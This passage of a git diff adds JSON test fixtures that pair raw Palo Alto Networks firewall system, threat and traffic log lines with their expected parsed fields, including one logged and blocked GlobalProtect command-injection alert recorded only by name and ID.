+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json
new file mode 100644
index 000000000..a00e82987
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_7_json.json	
@@ -0,0 +1,51 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:49.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170514,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:49.557000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:49.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170514,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:49.557000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Connection to Update server: updates.paloaltonetworks.com completed successfully, initiated by 1.2.3.4",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:49Z",
+    "action": {
+      "type": "general"
+    },
+    "destination": {
+      "address": "updates.paloaltonetworks.com"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4"
+      ]
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json
new file mode 100644
index 000000000..9cb10263a
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_8_json.json	
@@ -0,0 +1,43 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:54.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170519,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:54.757000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:54.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170519,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:54.757000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "Installed WildFire package: panupv3-all-wildfire-739613-742993.tgz",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:54Z",
+    "action": {
+      "type": "general"
+    },
+    "file": {
+      "name": "panupv3-all-wildfire-739613-742993.tgz"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json
new file mode 100644
index 000000000..2aa5ce29e
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_system_event_9_json.json	
@@ -0,0 +1,40 @@
+{
+  "input": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire version 739613-742993 downloaded by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170516,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}"
+  },
+  "expected": {
+    "message": "{\"ConfigVersion\": \"10.1\",\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DeviceGroup\": null,\"EventComponent\": null,\"EventDescription\": \"WildFire version 739613-742993 downloaded by Auto update agent\",\"EventName\": \"general\",\"EventTime\": \"2023-02-03T16:45:52.000000Z\",\"LogSourceID\": \"007954000351998\",\"LogSourceName\": \"PA-VM\",\"LogTime\": \"2023-02-03T16:45:56.000000Z\",\"LogType\": \"SYSTEM\",\"SequenceNo\": 7195838274152170516,\"Subtype\": \"general\",\"Template\": null,\"TimeGeneratedHighResolution\": \"2023-02-03T16:45:52.887000Z\",\"VendorSeverity\": \"Informational\",\"VirtualLocation\": \"\",\"VirtualSystemName\": null}",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "module": "WildFire",
+      "reason": "WildFire version 739613-742993 downloaded by Auto update agent",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:45:52Z",
+    "action": {
+      "type": "general"
+    },
+    "host": {
+      "name": "PA-VM"
+    },
+    "log": {
+      "level": "Informational",
+      "logger": "system"
+    },
+    "observer": {
+      "product": "PAN-OS"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json b/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json
new file mode 100644
index 000000000..48dc1f1bd
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_threat.json	
@@ -0,0 +1,94 @@
+{
+  "input": {
+    "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no,"
+  },
+  "expected": {
+    "message": "1,2024/01/12 11:21:15,016201000000,THREAT,url,2562,2024/01/12 11:21:15,1.2.3.4,5.6.7.8,9.10.11.12,0.0.0.0,SAAS vers log,,,ssl,vsys1,Outside,test-Externe,a11.30,a11.25,Panorama,2024/01/12 11:21:15,200000,1,58444,2222,58444,2222,0x50b444,tcp,alert,\"test.fr:9999/\",(9999),test,informational,client-to-server,55555555555555555555,0x8000000000000000,US,France,,,0,,,0,,,,,,,,0,0,0,0,0,,TEST-01,,,,,0,,0,,N/A,N/A,AppThreat-0-0,0x0,0,4294967295,,\"test,low-risk\",96eeeef8-bd9c-4145,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-01-12T11:21:15.190+01:00,,,,encrypted-tunnel,networking,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,ssl,no,no,",
+    "event": {
+      "action": "alert",
+      "category": [
+        "network"
+      ],
+      "code": "9999",
+      "dataset": "threat",
+      "outcome": "success",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-01-12T10:21:15.190000Z",
+    "action": {
+      "name": "alert",
+      "outcome": "success",
+      "type": "url"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "domain": "test.fr",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "0.0.0.0",
+        "port": 2222
+      },
+      "port": 2222
+    },
+    "log": {
+      "hostname": "TEST-01",
+      "level": "informational",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "ssl",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "TEST-01",
+      "product": "PAN-OS",
+      "serial_number": "016201000000"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "url",
+      "VirtualLocation": "vsys1",
+      "threat": {
+        "id": "9999"
+      }
+    },
+    "related": {
+      "hosts": [
+        "test.fr"
+      ],
+      "ip": [
+        "0.0.0.0",
+        "1.2.3.4",
+        "5.6.7.8",
+        "9.10.11.12"
+      ]
+    },
+    "rule": {
+      "name": "SAAS vers log",
+      "uuid": "96eeeef8-bd9c-4145"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "9.10.11.12",
+        "port": 58444
+      },
+      "port": 58444
+    },
+    "url": {
+      "domain": "test.fr",
+      "port": 9999,
+      "registered_domain": "test.fr",
+      "top_level_domain": "fr"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json b/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json
new file mode 100644
index 000000000..e45d01607
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_threat_02.json	
@@ -0,0 +1,91 @@
+{
+  "input": {
+    "message": "1,2024/08/12 15:57:12,012345678910,THREAT,vulnerability,2561,2024/08/12 15:57:04,1.2.3.4,5.6.7.8,1.2.3.4,5.6.7.8,Access_Portal-GW_GP,,,web-browsing,vsys1,INTERNET,INTERNET,ethernet1/3.302,ethernet1/3.302,default,2024/08/12 15:57:04,113535,1,56731,443,56731,20077,0x81402000,tcp,reset-both,\"login.esp\",Palo Alto Networks GlobalProtect OS Command Injection Vulnerability(95187),business-and-economy,critical,client-to-server,7334683348721844974,0x8000000000000000,United States,France,,,1210223766892439373,,,1,,,,,,,,0,320,90,0,0,,site1-FW01,,,,,0,,0,,N/A,code-execution,AppThreat-8879-8900,0x0,0,4294967295,,,abcdefgh-1234-5678-abcd-01234567890,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-12T15:57:04.614+02:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,",
+    "sekoiaio": {
+      "intake": {
+        "dialect": "Palo Alto NGFW",
+        "dialect_uuid": "903ec1b8-f206-4ba5-8563-db21da09cafd"
+      }
+    }
+  },
+  "expected": {
+    "message": "1,2024/08/12 15:57:12,012345678910,THREAT,vulnerability,2561,2024/08/12 15:57:04,1.2.3.4,5.6.7.8,1.2.3.4,5.6.7.8,Access_Portal-GW_GP,,,web-browsing,vsys1,INTERNET,INTERNET,ethernet1/3.302,ethernet1/3.302,default,2024/08/12 15:57:04,113535,1,56731,443,56731,20077,0x81402000,tcp,reset-both,\"login.esp\",Palo Alto Networks GlobalProtect OS Command Injection Vulnerability(95187),business-and-economy,critical,client-to-server,7334683348721844974,0x8000000000000000,United States,France,,,1210223766892439373,,,1,,,,,,,,0,320,90,0,0,,site1-FW01,,,,,0,,0,,N/A,code-execution,AppThreat-8879-8900,0x0,0,4294967295,,,abcdefgh-1234-5678-abcd-01234567890,0,,,,,,,,,,,,,,,,,,,,,,,,,,,,,0,2024-08-12T15:57:04.614+02:00,,,,internet-utility,general-internet,browser-based,4,\"used-by-malware,able-to-transfer-file,has-known-vulnerability,tunnel-other-application,pervasive-use\",,web-browsing,no,no,",
+    "event": {
+      "action": "reset-both",
+      "category": [
+        "vulnerability"
+      ],
+      "code": "95187",
+      "dataset": "threat",
+      "outcome": "success",
+      "reason": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2024-08-12T13:57:04.614000Z",
+    "action": {
+      "name": "reset-both",
+      "outcome": "success",
+      "type": "vulnerability"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "ip": "5.6.7.8",
+      "nat": {
+        "ip": "5.6.7.8",
+        "port": 20077
+      },
+      "port": 443
+    },
+    "file": {
+      "name": "login.esp",
+      "path": "login.esp"
+    },
+    "log": {
+      "hostname": "site1-FW01",
+      "level": "critical",
+      "logger": "threat"
+    },
+    "network": {
+      "application": "web-browsing",
+      "transport": "tcp"
+    },
+    "observer": {
+      "name": "site1-FW01",
+      "product": "PAN-OS",
+      "serial_number": "012345678910"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "320",
+      "DGHierarchyLevel2": "90",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "vulnerability",
+      "VirtualLocation": "vsys1",
+      "threat": {
+        "id": "95187",
+        "name": "Palo Alto Networks GlobalProtect OS Command Injection Vulnerability"
+      }
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "rule": {
+      "name": "Access_Portal-GW_GP",
+      "uuid": "abcdefgh-1234-5678-abcd-01234567890"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "ip": "1.2.3.4",
+      "nat": {
+        "ip": "1.2.3.4",
+        "port": 56731
+      },
+      "port": 56731
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json b/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json
new file mode 100644
index 000000000..d2e4e4775
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_timestamp_palo.json	
@@ -0,0 +1,41 @@
+{
+  "input": {
+    "message": ": 1,2023/08/01 04:03:24,026701002348,SYSTEM,general,2816,2023/08/01 04:03:24,,general,,0,0,general,informational,\"Request made to server \"\"server_test.com\"\" is successful . \",7261972653022396272,0x8000000000000000,0,0,0,0,,test-01,0,0,2023-08-01T04:03:24.705+02:00"
+  },
+  "expected": {
+    "message": ": 1,2023/08/01 04:03:24,026701002348,SYSTEM,general,2816,2023/08/01 04:03:24,,general,,0,0,general,informational,\"Request made to server \"\"server_test.com\"\" is successful . \",7261972653022396272,0x8000000000000000,0,0,0,0,,test-01,0,0,2023-08-01T04:03:24.705+02:00",
+    "event": {
+      "category": [
+        "host"
+      ],
+      "dataset": "system",
+      "reason": "Request made to server \"server_test.com\" is successful . ",
+      "type": [
+        "info"
+      ]
+    },
+    "@timestamp": "2023-08-01T02:03:24.705000Z",
+    "action": {
+      "name": "general",
+      "type": "general"
+    },
+    "log": {
+      "hostname": "test-01",
+      "level": "informational",
+      "logger": "system"
+    },
+    "observer": {
+      "name": "test-01",
+      "product": "PAN-OS",
+      "serial_number": "026701002348"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "EventID": "general",
+      "Threat_ContentType": "general"
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json
new file mode 100644
index 000000000..c0f834538
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_1_json.json	
@@ -0,0 +1,87 @@
+{
+  "input": {
+    "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}"
+  },
+  "expected": {
+    "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187101,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17635,\"SessionStartTime\": \"2023-02-03T16:46:00.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": null,\"SourceDeviceOSFamily\": null,\"SourceDeviceOSVersion\": null,\"SourceDeviceProfile\": null,\"SourceDeviceVendor\": null,\"SourceDynamicAddressGroup\": null,\"SourceEDL\": null,\"SourceLocation\": \"1.2.0.0-1.2.255.255\",\"SourcePort\": 59087,\"SourceUUID\": null,\"SourceUser\": null,\"Subtype\": \"end\",\"TimeGenerated\": \"2023-02-03T16:46:07.000000Z\",\"TimeGeneratedHighResolution\": \"2023-02-03T16:46:07.584000Z\",\"TimeReceived\": \"2023-02-03T16:46:14.000000Z\",\"ToZone\": \"untrusted\",\"Tunnel\": \"N/A\",\"URLCategory\": \"any\",\"VirtualLocation\": \"vsys1\",\"VirtualSystemName\": \"\",\"X-Forwarded-ForIP\": null}",
+    "event": {
+      "action": "allow",
+      "category": [
+        "network"
+      ],
+      "dataset": "traffic",
+      "duration": 0,
+      "outcome": "success",
+      "start": "2023-02-03T16:46:00Z",
+      "type": [
+        "end"
+      ]
+    },
+    "@timestamp": "2023-02-03T16:46:07Z",
+    "action": {
+      "name": "allow",
+      "outcome": "success",
+      "type": "end"
+    },
+    "destination": {
+      "address": "5.6.7.8",
+      "geo": {
+        "country_iso_code": "US"
+      },
+      "ip": "5.6.7.8",
+      "nat": {
+        "port": 0
+      },
+      "port": 443
+    },
+    "log": {
+      "hostname": "PA-VM",
+      "logger": "traffic"
+    },
+    "network": {
+      "application": "incomplete",
+      "bytes": 74,
+      "packets": 1
+    },
+    "observer": {
+      "egress": {
+        "interface": {
+          "alias": "untrusted"
+        }
+      },
+      "ingress": {
+        "interface": {
+          "alias": "untrusted"
+        }
+      },
+      "name": "PA-VM",
+      "product": "PAN-OS",
+      "serial_number": "007954000351998"
+    },
+    "paloalto": {
+      "DGHierarchyLevel1": "0",
+      "DGHierarchyLevel2": "0",
+      "DGHierarchyLevel3": "0",
+      "DGHierarchyLevel4": "0",
+      "Threat_ContentType": "end",
+      "URLCategory": "any",
+      "VirtualLocation": "vsys1"
+    },
+    "related": {
+      "ip": [
+        "1.2.3.4",
+        "5.6.7.8"
+      ]
+    },
+    "rule": {
+      "name": "intrazone-default",
+      "uuid": "f903db52-4b89-4610-b908-67be412704f0"
+    },
+    "source": {
+      "address": "1.2.3.4",
+      "bytes": 74,
+      "ip": "1.2.3.4",
+      "port": 59087
+    }
+  }
+}
\ No newline at end of file
diff --git a/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json
new file mode 100644
index 000000000..cfa92faf3
--- /dev/null
+++ b/Palo Alto Networks/paloalto-prima-access/tests/test_traffic_event_2_json.json	
@@ -0,0 +1,87 @@
+{
+  "input": {
+    "message": "{\"Action\": \"allow\",\"ActionSource\": \"from-policy\",\"Application\": \"incomplete\",\"Bytes\": 74,\"BytesReceived\": 0,\"BytesSent\": 74,\"ChunksReceived\": 0,\"ChunksSent\": 0,\"ChunksTotal\": 0,\"ConfigVersion\": \"10.1\",\"ContainerID\": null,\"ContainerName\": null,\"ContainerNameSpace\": null,\"DGHierarchyLevel1\": 0,\"DGHierarchyLevel2\": 0,\"DGHierarchyLevel3\": 0,\"DGHierarchyLevel4\": 0,\"DestinationAddress\": \"5.6.7.8\",\"DestinationDeviceCategory\": null,\"DestinationDeviceHost\": null,\"DestinationDeviceMac\": null,\"DestinationDeviceModel\": null,\"DestinationDeviceOSFamily\": null,\"DestinationDeviceOSVersion\": null,\"DestinationDeviceProfile\": null,\"DestinationDeviceVendor\": null,\"DestinationDynamicAddressGroup\": null,\"DestinationEDL\": null,\"DestinationLocation\": \"US\",\"DestinationPort\": 443,\"DestinationUUID\": null,\"DestinationUser\": null,\"DeviceName\": \"PA-VM\",\"DeviceSN\": \"007954000351998\",\"DynamicUserGroupName\": null,\"EndpointAssociationID\": 0,\"EndpointSerialNumber\": null,\"FromZone\": \"untrusted\",\"GPHostID\": null,\"HASessionOwner\": null,\"HTTP2Connection\": 0,\"IMEI\": null,\"IMSI\": 0,\"InboundInterface\": \"ethernet1/1\",\"LinkChangeCount\": 0,\"LinkSwitches\": null,\"LogSetting\": \"default\",\"LogType\": \"TRAFFIC\",\"NATDestination\": \"\",\"NATDestinationPort\": 0,\"NATSource\": \"\",\"NATSourcePort\": 0,\"NSSAINetworkSliceDifferentiator\": null,\"NSSAINetworkSliceType\": null,\"OutboundInterface\": \"ethernet1/1\",\"PacketsReceived\": 0,\"PacketsSent\": 1,\"PacketsTotal\": 1,\"ParentSessionID\": 0,\"ParentStarttime\": \"1970-01-01T00:00:00.000000Z\",\"Protocol\": \"tcp\",\"RepeatCount\": 1,\"Rule\": \"intrazone-default\",\"RuleUUID\": \"f903db52-4b89-4610-b908-67be412704f0\",\"SDWANCluster\": null,\"SDWANClusterType\": null,\"SDWANDeviceType\": null,\"SDWANPolicyName\": null,\"SDWANSite\": null,\"SequenceNo\": 7195838274152187100,\"SessionDuration\": 0,\"SessionEndReason\": \"aged-out\",\"SessionID\": 17634,\"SessionStartTime\": \"2023-02-03T16:45:44.000000Z\",\"SourceAddress\": \"1.2.3.4\",\"SourceDeviceCategory\": null,\"SourceDeviceHost\": null,\"SourceDeviceMac\": null,\"SourceDeviceModel\": 